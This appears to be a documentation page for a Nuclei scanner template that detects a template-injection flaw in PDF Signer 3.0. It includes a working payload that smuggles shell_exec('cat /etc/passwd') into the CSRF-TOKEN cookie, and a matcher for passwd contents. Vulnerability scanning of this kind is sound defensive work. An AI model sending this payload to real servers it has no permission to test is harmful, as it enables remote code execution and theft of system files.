Skip to content

PDF Signer 3.0 - Template Injection

ID: pdf-signer-ssti-to-rce

Severity: critical

Author: madrobot

Tags: ssti,rce,csrf

PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.

id: pdf-signer-ssti-to-rce
info:
name: PDF Signer 3.0 - Template Injection
author: madrobot
severity: critical
description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1336
metadata:
max-request: 1
tags: ssti,rce,csrf
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# digest: 4b0a00483046022100c000f1daf62f5d3dd07a2d8e79b4a7c3854391f3eae69d4cd6ebf46b9da4741602210095e4cd550cc9f0257b587d7d19dae06a4f3787bf53531530b9e4e738d1479cf2:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml"

View on Github